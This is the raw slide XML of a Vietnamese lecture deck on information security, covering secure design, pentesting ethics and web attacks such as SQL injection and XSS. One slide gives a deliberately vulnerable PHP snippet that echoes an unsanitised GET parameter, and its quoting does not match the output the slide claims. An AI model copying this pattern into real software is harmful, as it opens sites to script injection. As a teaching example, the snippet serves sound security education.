              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thiết kế phần mềm an toàn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51</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2463387177"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3802038"/>
          <a:ext cx="9144000" cy="2903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val 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="3802038"/>
            <a:ext cx="3352800" cy="290356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3083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3)">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marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fernandez-Buglioni, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security Pattern in Practice: Designing Secure Architectures Using Software Patterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Wiley 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nguyễn Đức Cường, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Tài liệu môn học Phân tích và thiết kế hệ thống thông tin theo UML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tài liệu tham khảo</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8905743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en-US" dirty="0" smtClean="0"/>
              <a:t>Không sử dụng các cấu trúc, các hàm không an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cơ chế phòng chống các tấn công đã biết</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử tĩnh cho mã nguồn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lập trình an toàn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53</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4548961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en-US" dirty="0" smtClean="0"/>
              <a:t>Lương Thế Dũng, Phạm Duy Trung, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Kỹ thuật lập trình an toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Học viện Kỹ thuật mật mã 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brian Chess, Jacob West, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Secure Programming with Static Analysic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Addison-Wesley 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+++</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tài liệu tham khảo</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29428524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en-US" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t> an toàn = Penetration Testing = Pentest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử an toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t> một hệ thống là việc mô phỏng các tấn công thực tế vào hệ thống đó để đánh giá rủi ro an toàn thông tin cho hệ thống đó</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử an toàn = Tìm lỗ hổng + Khai thác tối đa lỗ hổng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Khái niệm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55</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30498581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en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Phân loại</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử hộp đen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử hộp trắng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Vấn đề pháp lý</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dịch ngược, tấn công có thể vi phạm pháp luật</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phải được sự đồng ý bằng văn bản của chủ quản hệ thống</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kiểm thử an toàn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56</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28880548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pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trần Đức Sự, Phạm Minh Thuấn, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Đánh giá và kiểm định an toàn hệ thống thông tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Học viện KTMM, 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dieterle, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Testing with Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allen et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Linux – Assuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Packt 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+++</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tài liệu tham khảo</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23433110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en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cập nhật bản vá an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cập nhật tự động</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cập nhật thủ công</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Vận hành an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Xây dựng và áp dụng chính sách an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Đào tạo kỹ năng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nâng cao nhận thức</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Khai thác an toàn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58</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39343254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59</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15722921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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Truy cập trái phép CDSL: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Injection, </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Truy cập trái phép file: Path Traveling</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Đánh cắp tài khoản/quyền người dùng (Password guessing, SQL Injection, XSS, XSS Session Hijacking, CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Cài đặt mã độc (XSS+)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Quảng cáo (XSS Click Hijacking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Theo dõi người dùng (XSS Click Hijacking+)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Từ chối dịch vụ (spam)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Mục đích tấn công ứng dụng web</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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12396034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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Khái niệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>: XSS là một lỗ hổng cho phép hacker chèn script vào tham số truy vấn HTTP và sau đó script này được thực thi trên máy người dùng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Mục đích thực hiện XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Đánh cắp tài khoản</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Đánh cắp cookie (SessionID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Thực hiện Click Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="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7</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39606482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ross Site Scripting (XSS) - 6  (Reflected XSS at its best)">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0" y="1200150"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19684300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Cross-Site Scripting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9</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="914400"/>
            <a:ext cx="8534400" cy="251460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r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$name = $_GET['name'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo 'Welcome $name&lt;br&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo '&lt;a href="http://examples.com/"&gt;Click to Download&lt;/a&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3657600"/>
            <a:ext cx="8534400" cy="6096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vi-VN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.domain.com/index.php?name=John</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4267200"/>
            <a:ext cx="8534400" cy="1828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3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome John</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Click to Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11022643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potx" id="{149B5520-43E3-49CE-9896-7E2355D72C92}" vid="{766EDCEA-6032-41A3-A68D-E084F32FD4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48DF144363234F99CA1B6EB4420318" ma:contentTypeVersion="5" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="08501af7abbbc0e4b81dd86d569dcd6e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="c49a46b2-f99a-45a8-b821-acf4d4d71457" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f5c0c7d6c91eecea88bc6fabb00467de" ns2:_="">
    <xsd:import namespace="c49a46b2-f99a-45a8-b821-acf4d4d7145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9a46b2-f99a-45a8-b821-acf4d4d714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365AD2-F80D-404E-9954-C1047CA83D03}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F336F187-549A-443A-B11C-5DCC24E3B147}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Slide bài giảng</Template>
  <TotalTime>1215</TotalTime>
  <Words>1606</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>302</Paragraphs>
  <Slides>59</Slides>
  <Notes>10</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Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Slide bài giảng</vt:lpstr>
      <vt:lpstr>CƠ SỞ AN TOÀN THÔNG TIN</vt:lpstr>
      <vt:lpstr>An toàn phần mềm</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lỗ hổng ứng dụng web</vt:lpstr>
      <vt:lpstr>Mục đích tấn công ứng dụng web</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
